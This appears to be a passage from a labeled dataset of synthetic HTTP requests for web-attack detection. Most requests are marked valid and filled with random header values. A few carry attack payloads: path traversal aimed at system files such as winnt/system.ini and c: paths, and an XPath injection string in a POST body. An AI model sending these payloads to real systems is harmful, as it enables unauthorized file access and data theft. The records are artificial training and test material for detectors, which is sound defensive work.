User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 8.5; as-rd; rv:3.0.0) Gecko/59996899
UA-CPU: StrongARM
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0202x3743
Via: 7.1 www.phnr.tiff, FTP/5.2 148.110.111.47, etepec/2.5 www.endmhIia.js
Transfer-Encoding: ltjhe
Upgrade: uv6jTt/2.4
Warning: 803 145.78.232.247 "ihmqhTtecao" "Wed, 20 Aug 08 01:29:34 GMT"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

RtDmroecin=3&hUoeizy3noe4ok=tkahei1havt

End - Id: 5615
Start - Id: 31409
class: Valid
GET /YwzFEh9gKeC/e8areXWyao/oecihape8/1iTexec_dQa4.asmx?7rie=rshjao1diihtT HTTP/1.0
Host: 119.177.87.180
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: x-mac-greek, utf-8
Accept-Encoding: deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 94.233.71.72
Cookie: 8XO9cU=cDE4gpIOI;0wget1o=a@binf0racceptoAi  tl;enep9f=accept-Og?7/to7e%apnke3a
Cookie2: $Version="516"
Date: Thu, 17 Apr 08 20:49:41 GMT
ETag: "MVtyvOfwt3vQ32x"
Expect: CEnru=ndPz;grutd4a=tifut
From: Tzeuatea@eoges.de
If-Modified-Since: Sat, 12 Aug 06 09:09:33 UTC
If-Unmodified-Since: Tue, 11 Oct 05 04:27:06 GMT
If-Match: "8iMl4HlzQS3SUDW12koi"
If-None-Match: "vHdhiESwARVeSX8h7e"
If-Range: Mon, 02 Jun 08 20:05:34 GMT
Max-Forwards: 60
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aWhud3Rnb2E6YUVJb2VOYjE=
Authorization: NTLM MHBVRWU4dXl1aXR0b3R0a3l1Z2VoZXBlaGFDdnM4ZWxodHBJaWhpRHZtaG10
Range: -6182,52054-760058,9-
Referer: http://www.trCrat.cz/eunteF/dbla/8jhiiL.dll
TE: deflate;q=0.0,trailers
Trailer: Via
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 8.0; oO-iT; rv:3.4.6) Gecko/84415893
UA-CPU: StrongARM
UA-Disp: 8255,098,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: HTTP/7.6 60.122.148.201, 8.5 www.fctrr1l.jpg
Transfer-Encoding: deflate
Upgrade: eiKz/4.5, tfe/0.1, nnhn/4.9, fptn/7.8, iuaOf/8.9
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31409
Start - Id: 22769
class: Valid
GET /uc5bylR8b/g4gKgnpz6ffG/naeo5wvteS/joeySfnbpcfT.aspx?oescusewnsec4=t8ojotmtekctiaeIn&v-ZzzQxsamt=wp&RxmlWfSb4PF=aawuaslodujl&r6rfeo=dts3etnd HTTP/1.1
Host: 9.89.28.204
Connection: iaoIciot
Accept: application/*;q=0.1
Accept-Charset: iso-8859-15, iso-10646-ucs-2;q=0.3, us-ascii
Accept-Encoding: compress;q=0.0, gzip
Accept-Language: Nm4oas-tai2a, I6leAg-v8ebe7bq;q=0.4, genul-rda8h;q=0.9, mjanoe5-imch;q=0.2
Cache-Control: max-stale
Client-ip: 111.76.241.226
Cookie: Fi_b2TzwKdeleteJ=iFewfVV5hK
Cookie2: $Version="613"
Date: Sun, 26 Apr 09 11:02:59 GMT
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Mon, 08 Aug 05 07:48:15 CET
If-Unmodified-Since: Fri, 20 Jun 08 23:04:33 GMT
If-Match: *
If-None-Match: "B1wlnq@SK5sh3Cn_U0"
If-Range: *
Max-Forwards: 452
MIME-Version: 7.9
Pragma: gyeVr='r0Mascjr'
Proxy-Authorization: NTLM cXNybnI0Z3RQc2M5c050dGV1aG5kc2RzcHRsYTVSZW9obnVoVGVqckI=
Authorization: sTdy 4EUuo=cNift
Range: 99-,6365-5,018-
Referer: http://l7n7.org/DnonnOef/heciho/oItsa/Ysieeb.tar.gz
TE: gzip,deflate
Trailer: Authorization
User-Agent: hesYt7odds (g@Znvo54; nkmmYY-p)
UA-CPU: 68000
UA-Disp: 0788,9372,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5579x6271
Via: gI8aa/2.0 www.elxilEt.js
Transfer-Encoding: gzip
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 477 www.rn77u.jpg "aisas1Lsgr" 
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 913992778218417738
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 22769
Start - Id: 27558
class: Valid
GET /iGLFpg.w52kklAz.jpeg?iihkDiNteTumdl=leNIcucsMun69ectt HTTP/1.0
Host: 80.146.200.22
Connection: close
Accept: video/*;q=0.2, text/plain
Accept-Charset: iso-8859-7, big5;q=0.3, x-mac-roman;q=0.2
Accept-Encoding: gzip, deflate;q=0.5, compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 43.118.104.43
Cookie: nOfnrxatPs=i23a;eakw=adropdigloui6ryupdate;aoiVle=7888;wduvhjua2Et4zfr=servicesexec<ro;ettsemtThnhac6m=ieehmetal4;oe8sMo9=ewu
Cookie2: $Version="6"
Date: Sun, 15 Mar 09 11:04:42 GMT
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 004
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: i298 m0epon=yraw
Range: 85626-
Referer: http://www.uer7rr.net/et5DW/eaniar/rUcid0/leu3h.swf
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.3 (compatible; Konqueror/8.1; Win 9x; rdEvmeps)
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: HTTP/4.4 www.eonmr.tiff, 9.5 www.jeirh.tiff:0152
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 199 www.retlii.gif "37stwavrtcE7t7wasn" "Sun, 24 Oct 04 10:49:59 UTC"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27558
Start - Id: 5509
class: Valid
PUT /37etjCOTrNezgN/uq/eSyg4ywCwES7nF9/o-226lwE@wZaQaKx3olc/Abody2or4Krfromq3mGFy/3PmmW/DqjVNwindow.open.uUP/j@/npnh3/oJUQTo.cgi? HTTP/1.1
Content-Length: 275
Content-Language: re,I9oie,mmd
Content-Encoding: deflate
Content-Location: /ekde/si7y/bq8sct3t/egsrsee/htfzi.exe
Content-MD5: ZW9zM256dG90T3M4Nm9zcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Mar 06 05:30:49 CET
Last-Modified: Tue, 26 Feb 08 06:09:31 GMT
Host: 68.112.104.175
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Ds-1er, itae-geu4sq, gbmr8-3Aehdin;q=0.5
Cache-Control: no-cache
Client-ip: 158.89.14.102
Cookie: j4aujCftahkesu=rp96;5mwenr9ektuedl=aeioahhlMzeEtylLnc;ennendsss8n=58737054
Cookie2: $Version="30"
Date: Sun, 01 Apr 07 17:47:49 CET
ETag: W/"ClRNYgOpJa7vxzd"
Expect: 100-continue
From: RlTg@lDaee.org
If-Modified-Since: Tue, 10 Jan 06 01:31:47 GMT
If-Unmodified-Since: Fri, 10 Aug 07 17:00:03 UTC
If-Match: "2EQ0WCyjZ@4aCj@P7"
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic RXR3d2dpd3c6dzZnZXB4ag==
Authorization: td2os rysi0=u5itgadb
Range: 4-,7992-3492,625-
Referer: /dmhctx0u.php4
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.9 (Windows; U; WinNT 5.9; yo-ta; rv:0.3.1) Gecko/19439887
UA-CPU: 68000
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4443x6588
Via: HTTP/7.5 www.5ttqe.shtml
Transfer-Encoding: gzip
Upgrade: ttd44a/8.9, eme6te/3.4, sge/5.8, 8mn/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 926841
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ux3qhqb=tfohr8IAy3et2&rojoawtb=<x&mgn=4rliFtUxp&3habpsof=536&tichTe0hlechorc=updateI eiofheechohtidsyda&Rq4h=9BR5Rx4Z23X&-LG-Qjbgsounde3b=h?d3rs&yedd=9187&re=asDfCsx&esoeHehee=1507776&mncs5bsndzahExa=\hautoexec&sy=tsrevtogoede3lvmka&xblU5iRdYHZ=207&6nIan4o53c7=33462259

End - Id: 5509
Start - Id: 10323
class: Valid
GET /trnaOf_Hc/neiszshtoemg/e@/sedwwrscbmrlhZr1/obh/vofid7fDd7tiedxiznn/ik6xcHtHUwdzkPvGs/25s6H/L4xp_b/o5hp_Cl2YIT5yB6zsWZM/ACBjVhtacces2v@mail/hUF0v1zD2wLic9xqy.jsp? HTTP/1.0
Host: www.EtneUrxzmr.be:57
Connection: asnc
Accept: */*
Accept-Charset: iso-8859-9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 225.199.96.45
Cookie: tlxk9sfcx0mtrU=2lylsweateieOgaotl;tdocumentn3JtmpGK@V=6ia0oohooI7e;AtrrtqoalhvmBu=9;kimscxrihdv=ecmdib
Cookie2: $Version="56"
Date: Fri, 23 Jan 09 22:48:00 GMT
ETag: W/"EYezGROZhzumkOacy"
Expect: teax
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Mon, 29 Nov 04 15:40:57 UTC
If-Match: "_BK-rcMwi22BTxR@"
If-None-Match: "9Foilaht91Oj7ghb"
If-Range: Mon, 29 Dec 08 12:06:17 CET
Max-Forwards: 5416
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZGlkb1N0aGVEb2ZhZWRyZWVuc3hlTmU5ZmloaXdhYWNoaDJ1dGlC
Range: -708348,-278258
Referer: http://nnptg1.com/gtDiEeoe/nl3s.dll
TE: trailers
Trailer: Proxy-Authorization
User-Agent: hknfsws0E (t0itiWr)
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 1.7 www.eHpag1e.gif, 1.5 19.138.147.176:40705
Transfer-Encoding: compress
Upgrade: pnge/0.2
Warning: 464 www.t6l1.jpeg "rueaeivla7hs" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 10323
Start - Id: 27857
class: Valid
GET /1afeyeuak/hMGIRxYnjC1tSe3/599TXfromjsRADk/HTstdinlGM/2eh0.shtml?eoD=hr&Nevalpg=KdhInididldco38Eatq HTTP/1.1
Host: www.lathncn.be:4
Connection: uat6M
Accept: video/quicktime;q=0.8, text/xml;q=0.7, text/*;q=0.8
Accept-Charset: windows-1258, iso-8859-6;q=0.4, x-mac-korean
Accept-Encoding: 
Accept-Language: u-aei0ecod;q=0.9
Cache-Control: max-stale=6
Client-ip: 175.135.1.248
Cookie: oang=09;yaRtt1xemtSea7=olf;ofc1n=tIiXFO0w7;snTtohtfc6j5ad0=353618;lhnailc6ilvk=33472
Cookie2: $Version="757"
Date: Wed, 06 Feb 08 02:47:09 GMT
ETag: W/"r1pV2nzMHWVoX_Rcg"
Expect: adii=ethr
From: iIjd@CLYb5so1.org
If-Modified-Since: Tue, 07 Aug 07 09:55:01 CET
If-Unmodified-Since: Wed, 19 Dec 07 03:14:02 UTC
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: *
If-Range: Mon, 24 Jan 05 07:29:42 CET
Max-Forwards: 942
MIME-Version: 9.9
Pragma: ktbi1=h
Proxy-Authorization: NTLM Mk9wMWVpbmFkbW95cWlhdXRndzduaXljNmd6cWV3bmNvT2hD
Authorization: ya1a iooNfsma=tht3nei
Range: 388-
Referer: http://www.mmdPie.fr/enjnbite/6aoLapt/urbeegea.nsf
TE: deflate,trailers
Trailer: Upgrade
User-Agent: srtdx/0.2.0.1
UA-CPU: MIPS
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0689x744
Via: FTP/4.7 www.oiBm2n.png
Transfer-Encoding: compress
Upgrade: u5mq12/7.0, Pdmae/4.0, ydahC3/6.1
Warning: 085 99.23.2.41 "ihee9hbsteh40fi" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 92325368257
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27857
Start - Id: 44971
class: PathTransversal
GET /elr/@4ydLvBxvYbwq6/7b/nlkNZIyadiNMqCNm2/wtabi7RliML4sna7y/ncy99_FNVgsL6-9XkE/sYwYGX/mIo/eWgRKItBrEgm/ttp1eHErarh7nt6eeke/Rooe0on2eacT1t/mtxITl.cgi?o4=doc%28++file%3A%2F%2F%2Fc%3A%2Fsr%2FFtu.xml+++++%29&9aIdrk=0Qfn%27%3BemeoT6i50+childa&Kbt3tiyl3UiAe=Aands&tdererSugsiP1sy=6ZyxHrTA&cyyEag=srautoexec%28te&ensEodte=aBAX4i0MK&nRbgsoundyOuwss8x=%5BjfdsixtermdeZh7bgsound&sieIyhaWestsrO=iaeq&tnd=3498223&sot=oRAvc-.pqc&rnsc5azc=ns&etnze=dtju.A.Mz3 HTTP/1.1
Host: 25.113.97.17:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.0
Accept-Encoding: identity;q=0.6, deflate
Accept-Language: btnaz-ls;q=0.6, 1cerl-sTi;q=0.5, ysus-sitcfeeo;q=0.1, h74leua-edllaY
Cache-Control: max-age=87
Client-ip: 37.127.94.91
Cookie: qlemkone=001286
Cookie2: $Version="5"
Date: Sun, 02 Oct 05 06:03:51 CET
ETag: "NFwIQBsA9AL9_999R"
Expect: SkhguTri
From: rtuAdC@8eshsl.biz
If-Modified-Since: Wed, 17 Sep 08 10:57:02 CET
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: "lGZ-Esv5nhspCkT26rdz"
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:01:02 UTC
Max-Forwards: 3
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bGRBYWg6emllYg==
Authorization: NTLM ZWUxbzRqZWVhOGxlcmFCYmpyeWhpNjdyaXN1cm5uZG50YlJtcW5iNHlrZ2ViN2E=
Range: -972278
Referer: /x55NuB/uontc/eaieso/pl3nee/at1ts.sh
TE: trailers,trailers
Trailer: Accept
User-Agent: e4AcDD http://www.zUPeC.gov
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/4.0 197.14.21.17
Transfer-Encoding: itro
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 1771477439
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44971
Start - Id: 9989
class: Valid
GET /nC.sh? HTTP/1.0
Host: www.arNOiegt3t.gov:7
Connection: keep-alive
Accept: audio/basic, image/png, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: min-fresh=899
Client-ip: 41.19.16.178
Cookie: nNzxawe5l=ui;GKl00MG=7b2ypfism4wt;crHnrtbi=?aie/rd gdso;ylielO=sXy0@9jV
Cookie2: $Version="25"
Date: Sat, 09 Jan 10 07:44:34 UTC
ETag: W/"Xm_AbeCBSRCOVhv_Iyj2"
Expect: h7yLh
From: wsO7end1@rfmr.fr
If-Modified-Since: Mon, 31 Dec 07 06:49:46 GMT
If-Unmodified-Since: Wed, 18 Apr 07 18:23:37 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 26 May 09 09:19:57 CET
Max-Forwards: 9
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: adE2 tucxsisy=rg2o
Authorization: Basic dHpvdTpvUW5k
Range: 7-,1-2,575-73
Referer: http://Stfrhir.ch/mlSnsxda/cist.sh
TE: gzip;q=0.2,gzip;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 7.3; 3c-Oa; rv:3.6.5) Gecko/63388365
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/3.6 www.lInankUy.jpg, eeidm/4.5 253.100.33.86, ihele5/8.9 www.es8tugiw.htm:189
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 190 96.212.144.39 "6eoaBieotasga" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9989
Start - Id: 929
class: Valid
GET /7u7498xoMX4eBy./s_O1.hTY4da/cEeT07L/wXK2t/pbZKOXnS_ysn5yYEcD@M.html?ZsVH=7&na=%40owttmeta&Ntptyebh=fJ3p-h1NP0SX&EiA=%29imtieit%3Baaa&ijtse7siOupA=+vbscriptg&thgIapae4rGso=fSiYsstulenoreS&oaz8SE8drjt=iEfaegoa&nuttuegirutj=317&sfhtSis=sL.Rvs1b HTTP/1.0
Host: www.vctonEw.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1252;q=0.8, windows-1254, macintosh;q=0.5, x-mac-japanese;q=0.2, windows-1251;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 36.42.207.254
Cookie: Z86n9p-X=omhili>3 ei;J7XCjVU4=eVGChP
Cookie2: $Version="109"
Date: Sun, 27 Feb 05 14:45:31 CET
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Wed, 12 Dec 07 20:16:29 GMT
If-Unmodified-Since: Sun, 17 Jun 07 16:03:29 GMT
If-Match: "R3j.HT8pUVCPMQrncj"
If-None-Match: "l1MekAP1tMVNfM9d"
If-Range: Thu, 02 Jul 09 05:27:47 UTC
Max-Forwards: 139
MIME-Version: 3.0
Pragma: weysiHej=rc9
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: NTLM aDhlNG5lTm9vNThkdDB0dEllbDNpN3MzcjV0dGxlb3JvdGhUbDVldHJvY3da
Range: 37-165,99813-448132
Referer: http://www.tLlt.de/eytm8eer/mwDEaais.mdb
TE: trailers
Trailer: If-None-Match
User-Agent: iwkrtow/5.4.0
UA-CPU: StrongARM
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7361x8160
Via: HTTP/7.6 159.166.146.91:2
Transfer-Encoding: Oonem; efehoc6z=AfsbR1nl
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 929
Start - Id: 48519
class: XPathInjection
POST /t0bmnreCetsoldbsg/t2UsH/as32n/YhttpsrmfC1/iG1eXXD-vSp/wYJjb_/lQZ438/-@@j3execGa0Wc/aYzrf0QEsC-/irmIlrnaCN/min/dl_GT2tb3i5hGoCEJuUq.jpg? HTTP/1.1
Content-Length: 513
Content-Language: 8ndi,orLt
Content-Encoding: compress
Content-Location: http://www.efEnt.net/hhnf.mspx
Content-MD5: dGF0bXJlbnJvdGxyTnBscg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Wed, 20 Sep 06 17:06:54 UTC
Host: 66.19.241.100:80
Connection: close
Accept: audio/basic
Accept-Charset: x-mac-arabic, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="090"
Date: Mon, 04 Dec 06 06:50:16 CET
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Sat, 12 Jul 08 15:43:42 CET
If-Unmodified-Since: Fri, 16 Apr 10 09:05:13 UTC
If-Match: *
If-None-Match: "CRF7bM-U7NLhH0jfaJvj"
If-Range: Tue, 30 Mar 04 24:54:00 GMT
Max-Forwards: 78
MIME-Version: 5.4
Pragma: eb=ikeaos
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: /0mi7/eycb/unoirLq.dll
TE: deflate;q=0.5
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (Windows; U; WinNT 8.9; be-oy; rv:6.5.8) Gecko/06931159
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 6365x946
Via: 0.9 48.90.143.119
Transfer-Encoding: deflate
Warning: 283 189.124.207.85 "vebezowbrhykjtd" "Fri, 02 Apr 10 02:42:52 CET"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

maf8E=MwjSyh'    or count(   path/child::node()[position(    )=(( i   +    j+   k    +   l +  1)]   |    path/child::*()[position()=(k+1)])=1    or  'Freiya'    = ' nss'    or&tjfdbSsfodOteNu=h9l&rosf=mtra&e3nuUer1dorU=sWNMvcR1&keFMMGM@=hrRJswpsRL&lr=1&bIjJ7Z8HWgbetween=ewd&onM=4651648&E-xxGs=tDb&DaGJQQ7=rpsnwirdfu5tsam%&jhfcte1rirriiin=n5JSsSo@9&toee92lNhzeiwar=032&BKlinkncaccess_logO=crBtnoUvtuuG&ct=0&nadolntsixtE=niO6vHSYG

End - Id: 48519
Start - Id: 26893
class: Valid
GET /on/se6yMrjhfnotluE5t/a9/eLggasdt4lio/XDxa3Craea9r/tPc5HrX66Wk5wm_2zcJ.sh?3rerNni=24906237&orsgTkamn1lat=486913 HTTP/1.0
Host: www.tnbsbo.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ctoirs-Hnhds7, f-a;q=0.6, sr5ha1n-i, orr-ttmu81l;q=0.1
Cache-Control: only-if-cached
Client-ip: 242.251.25.226
Cookie: Xuyj4YjS1=45;e4eye=tlcfartt4uFni6E;egl2tl=connectk giT=;iesdrh=ktpNLi
Cookie2: $Version="22"
Date: Thu, 04 Nov 04 19:38:39 CET
ETag: W/"n3wtu9Zffju0BFJ"
Expect: aihttOnp
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Sat, 07 Jan 06 12:28:07 UTC
If-Unmodified-Since: Tue, 04 Aug 09 18:00:20 UTC
If-Match: *
If-None-Match: *
If-Range: "2zD0WppHeD0v._PW.R-"
Max-Forwards: 7
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: r2458w gcrmd3=dsee
Authorization: Basic bmFlb205OnNhdHRzbg==
Range: 70837-,02-
Referer: /hvgeim.asmx
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: pu2q@4GO http://www.eEoo.uk
UA-CPU: Sparc
UA-Disp: 0594,3975,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0290x1154
Via: 4.0 www.5ngna.htm
Transfer-Encoding: gzip
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 320 www.tOi09.js:5 "prd3penwai4ynadT0" 
X-Forwarded-For: 202.36.161.97
X-Serial-Number: 06520
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26893
Start - Id: 29790
class: Valid
GET /PbU3vDxaWI.V/JVZ6waK_havingCCgMrmE/Iu.R8lQexecs.cgi?itqsh=sal&nt=nwwecopy%7Esdeie%3B&daUaulhBegLfR=nI6HytVd.M&ApzzKQm.Y=osdaiu&s0=xUGsOrQr6 HTTP/1.1
Host: www.eurSgT.be
Connection: CeDkahei
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=249
Client-ip: 107.22.205.177
Cookie: hsj=4nar5sfsmtoIs2o;oheurr=3232;tghcBumroe=87iGet
Cookie2: $Version="92"
Date: Sat, 11 Apr 09 08:42:15 UTC
ETag: "hPpIiMmM7JTv93r0P"
Expect: 100-continue
From: mptr@19anuaa52a.net
If-Modified-Since: Mon, 27 Sep 04 09:37:13 UTC
If-Unmodified-Since: Tue, 04 Aug 09 11:54:39 GMT
If-Match: "XomgH1jG_XRnhYc1e_"
If-None-Match: "UdqfqgWwjxPdIXC"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: aohsg ns1ea=ddEe6l
Authorization: Digest cnonce="mSep96"
Range: -192,85376-41938,2-
Referer: /dlos/kltafRmu.pl
TE: chunked;q=0.0,trailers,trailers
Trailer: If-Range
User-Agent: e3ihytaaele7hx
UA-CPU: Sparc
UA-Disp: 2709,734,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2347x796
Via: 0.1 www.ylmht.css, 3.8 133.153.205.238, 0.9 215.99.174.167:5
Transfer-Encoding: GEoa
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 671 www.dhevPk.tiff "ytaet" "Wed, 23 Dec 09 23:58:59 CET"
X-Forwarded-For: 7.71.153.105
X-Serial-Number: 12359876982638096
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29790
Start - Id: 8176
class: Valid
GET /tn/9-xU4F6TmM6y4/uscriptdwinntOpjiachild/divPnKd5B_m/kxF/sYIgcbh1IY-ET0O/ahNaa/.GaJpasswd2P0ynph-_/p1LwcKvEhyDOpWRetMy1/hsEi/eu3BBD@9N/aytoh7tinawe.mspx? HTTP/1.0
Host: www.ifsrmrioos.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 211.0.69.95
Cookie: h0=y
Cookie2: $Version="4"
Date: Tue, 18 Mar 08 18:34:24 CET
ETag: "CJ2FHvY_yVxe4mme"
Expect: 100-continue
From: lncsrs1@ssri.net
If-Modified-Since: Fri, 05 Nov 04 03:52:44 GMT
If-Unmodified-Since: Fri, 10 Dec 04 02:22:06 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Feb 08 08:15:31 CET
Max-Forwards: 97
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic SWNjczpnbzNyZThz
Range: -635
Referer: http://www.eudate3.gov/Eoaedi8l/sa4whn.ace
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: yHaxhlaE (sV@6.zJ2.c; ngROyK; b.41W5O; nzotGqZB; yFAsmj559r)
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1852x378
Via: 8.2 35.45.231.35:1363, 8.8 210.179.65.80, 8.1 www.AoceaT.shtml
Transfer-Encoding: identity
Upgrade: nas/1.0, rc6/4.9, dtmas/3.2, uIcq/4.7, essls/9.6
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 143.171.199.183
X-Serial-Number: 81045574594520616
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8176
Start - Id: 45070
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: 121.174.252.28
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: sv1ehn-ler;q=0.8, tXt0inrr-ecgoiClw, rviaek-aq6m
Cache-Control: min-fresh=85486
Client-ip: 4.109.212.12
Cookie: trptb=Pti jtanl;RYCVQYNOXVVt=fnirT6ctb t 8Eusr@iframeqs;ieanosoEwyrj3=ihfcoN;yrSe=8077760233;r5a3=4s
Cookie2: $Version="785"
Date: Fri, 26 Mar 04 02:32:20 UTC
ETag: "_uREHyn1qc_Dj7YZg"
Expect: 100-continue
From: aeoAhgee@sCjstt.it
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
